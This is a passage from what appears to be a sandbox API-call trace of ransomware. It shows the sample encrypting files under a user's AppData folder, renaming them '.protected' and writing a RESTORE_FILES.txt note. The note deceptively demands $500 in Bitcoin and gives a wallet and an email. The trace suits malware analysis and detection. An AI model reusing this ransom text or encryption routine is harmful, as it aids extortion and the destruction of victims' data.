tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.651] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0084.652] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.652] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.652] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.652] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0084.653] CloseHandle (hObject=0x14c) returned 1 [0084.653] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.653] lstrcmpiW (lpString1="6ASVN7J7", lpString2="Windows") returned -1 [0084.653] lstrcmpiW (lpString1="6ASVN7J7", lpString2="Program Files") returned -1 [0084.653] lstrcmpiW (lpString1="6ASVN7J7", lpString2="Program Files (x86)") returned -1 [0084.653] lstrcmpiW (lpString1="6ASVN7J7", lpString2="$Recycle.bin") returned 1 [0084.653] lstrcmpiW (lpString1="6ASVN7J7", lpString2="System Volume Information") returned -1 [0084.653] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7") returned 78 [0084.653] lstrcmpW (lpString1="6ASVN7J7", lpString2=".") returned 1 [0084.653] lstrcmpW (lpString1="6ASVN7J7", lpString2="..") returned 1 [0084.654] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\*") returned 80 [0084.654] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0084.654] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.654] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.654] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.654] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.654] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.654] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\.") returned 80 [0084.654] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.654] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.654] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.654] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.654] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.654] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.654] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.654] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.654] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.654] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.654] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.654] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.654] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\..") returned 81 [0084.654] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.655] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.655] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.655] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.655] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.655] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.655] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.655] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0084.655] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0084.655] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0084.655] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0084.655] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0084.655] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini") returned 90 [0084.655] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0084.655] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0084.655] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.655] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.655] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini") returned 90 [0084.655] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0084.655] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini") returned 90 [0084.655] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0084.655] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini") returned 90 [0084.655] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0084.656] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0084.656] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.656] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0084.657] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.657] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.657] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.657] CloseHandle (hObject=0x150) returned 1 [0084.657] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini.protected") returned 100 [0084.657] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini.protected")) returned 1 [0084.658] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.658] lstrcmpiW (lpString1="fwlink[1]", lpString2="Windows") returned -1 [0084.658] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files") returned -1 [0084.658] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files (x86)") returned -1 [0084.658] lstrcmpiW (lpString1="fwlink[1]", lpString2="$Recycle.bin") returned 1 [0084.658] lstrcmpiW (lpString1="fwlink[1]", lpString2="System Volume Information") returned -1 [0084.658] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]") returned 88 [0084.658] StrStrIW (lpFirst="fwlink[1]", lpSrch=".protected") returned 0x0 [0084.658] lstrcmpW (lpString1="fwlink[1]", lpString2="RESTORE_FILES.txt") returned -1 [0084.658] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.658] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.658] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.659] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]") returned 88 [0084.659] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0084.659] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]") returned 88 [0084.659] StrStrW (lpFirst="fwlink[1]", lpSrch=".rar") returned 0x0 [0084.659] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]") returned 88 [0084.659] StrStrW (lpFirst="fwlink[1]", lpSrch=".zip") returned 0x0 [0084.659] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.659] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.659] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.659] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.659] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.660] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.660] CloseHandle (hObject=0x150) returned 1 [0084.661] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1].protected") returned 98 [0084.661] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1].protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1].protected")) returned 1 [0084.661] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0084.661] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0084.661] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\RESTORE_FILES.txt") returned 96 [0084.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.670] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.670] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0084.671] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.671] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.671] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.671] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0084.671] CloseHandle (hObject=0x14c) returned 1 [0084.672] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.672] lstrcmpiW (lpString1="D68G7BIJ", lpString2="Windows") returned -1 [0084.673] lstrcmpiW (lpString1="D68G7BIJ", lpString2="Program Files") returned -1 [0084.673] lstrcmpiW (lpString1="D68G7BIJ", lpString2="Program Files (x86)") returned -1 [0084.673] lstrcmpiW (lpString1="D68G7BIJ", lpString2="$Recycle.bin") returned 1 [0084.673] lstrcmpiW (lpString1="D68G7BIJ", lpString2="System Volume Information") returned -1 [0084.673] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ") returned 78 [0084.673] lstrcmpW (lpString1="D68G7BIJ", lpString2=".") returned 1 [0084.673] lstrcmpW (lpString1="D68G7BIJ", lpString2="..") returned 1 [0084.673] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\*") returned 80 [0084.673] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0084.673] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.673] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.673] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.673] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.673] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.674] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\.") returned 80 [0084.674] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.674] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.674] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.674] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.674] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.674] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.674] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.674] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.674] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.674] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.674] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.674] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.674] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\..") returned 81 [0084.674] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.674] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.674] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.674] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.674] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.674] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.674] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.674] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.674] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0084.674] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0084.674] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0084.674] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0084.674] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0084.674] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini") returned 90 [0084.674] StrStrIW 